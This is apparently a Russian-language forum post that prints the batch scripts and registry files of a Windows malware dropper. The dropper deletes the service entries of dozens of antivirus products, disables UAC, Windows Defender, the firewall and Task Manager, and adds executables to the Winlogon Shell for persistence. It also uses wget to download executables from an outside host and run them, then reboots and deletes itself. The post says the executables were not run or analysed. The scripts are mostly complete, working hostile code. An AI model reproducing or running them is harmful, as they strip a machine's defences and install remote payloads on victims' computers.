"HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MsMpSvc" /f Reg Add "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /v "Start" /t REG_DWORD /d "4" /f bcdedit /deletevalue "{current}" safeboot reg add "HKLM\SYSTEM\CurrentControlset\Control\Nls\Language" /v "Default" /t REG_SZ /d "0409" /f regedit /s %windir%\usw.reg regedit /s %windir%\d.reg set /a tz=(%random%%%4)+1 if %tz% == 1 regedit /s %windir%\at.reg if %tz% == 2 regedit /s %windir%\ct.reg if %tz% == 3 regedit /s %windir%\et.reg if %tz% == 4 regedit /s %windir%\mt.reg del %windir%\Set-up.exe del %windir%\at.reg del %windir%\ct.reg del %windir%\et.reg del %windir%\mt.reg del %windir%\c.exe del %windir%\usw.reg del %windir%\d.reg del %windir%\b.bat shutdown /r /f /t 10 del %0 :: :: | Код: выделить все @echo off set "url=http://db.softfire.info/rs/st" :: :: set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" (set "bits=32") else set "bits=64" regedit /s %windir%\mgr_f.reg timeout /t 30 %windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe" if exist "%windir%\fr.exe" ( goto start_fr ) else ( timeout /t 120 %windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe" if not exist "%windir%\fr.exe" exit goto start_fr ) :e timeout /t 60 %windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe" %windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat" if exist "%windir%\e.bat" ( start %windir%\e.exe ) else ( timeout /t 120 %windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe" %windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat" if not exist "%windir%\e.bat" exit start %windir%\e.exe ) Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits% if %ERRORLEVEL% EQU 0 ( regedit /s %windir%\e.reg del %windir%\e.reg del %windir%\fr.exe del %windir%\d.exe del %windir%\s.txt del %0 ) else ( regedit /s %windir%\mgr_n.reg exit ) :start_fr Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits% if %ERRORLEVEL% EQU 1 start %windir%\fr.exe goto e :: | Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "EnableLUA"=dword:00000000 "ConsentPromptBehaviorAdmin"=dword:00000000 "PromptOnSecureDesktop"=dword:00000000 "ConsentPromptBehaviorUser"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend] "Start"=dword:00000005
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess] "Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc] "Start"=dword:00000004 | Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation] "Bias"=dword:000000f0 "DaylightBias"=dword:00000000 "DaylightName"="@tzres.dll,-82" "DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "StandardBias"=dword:00000000 "StandardName"="@tzres.dll,-82" "StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "TimeZoneKeyName"="Atlantic Standard Time" "DynamicDaylightTimeDisabled"=dword:00000001 "ActiveTimeBias"=dword:000000f0 |
Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation] "Bias"=dword:00000168 "DaylightBias"=dword:00000000 "DaylightName"="@tzres.dll,-151" "DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "StandardBias"=dword:00000000 "StandardName"="@tzres.dll,-152" "StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "TimeZoneKeyName"="Central America Standard Time" "DynamicDaylightTimeDisabled"=dword:00000000 "ActiveTimeBias"=dword:00000168 |
Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation] "Bias"=dword:0000012c "DaylightBias"=dword:00000000 "DaylightName"="@tzres.dll,-112" "DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "StandardBias"=dword:00000000 "StandardName"="@tzres.dll,-112" "StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "TimeZoneKeyName"="Eastern Standard Time" "DynamicDaylightTimeDisabled"=dword:00000001 "ActiveTimeBias"=dword:0000012c |
Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation] "Bias"=dword:000001a4 "DaylightBias"=dword:00000000 "DaylightName"="@tzres.dll,-192" "DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "StandardBias"=dword:00000000 "StandardName"="@tzres.dll,-192" "StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "TimeZoneKeyName"="Mountain Standard Time" "DynamicDaylightTimeDisabled"=dword:00000001 "ActiveTimeBias"=dword:000001a4 | Код: выделить все Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr"=dword:00000001 |
Код: выделить все Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr"=dword:00000000 | Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "Shell"="explorer.exe,c.exe" |
Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "Shell"="explorer.exe,d.exe" |
Код: выделить все Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "Shell"="explorer.exe,e.exe" | Просмотр потрохов exe файлов. Запуск этих файлов не проверялся, вскрытие тоже не производилось по причине отсутствия необходимых мощностей и инструментов. Скриншоты в спойлере. |
|
|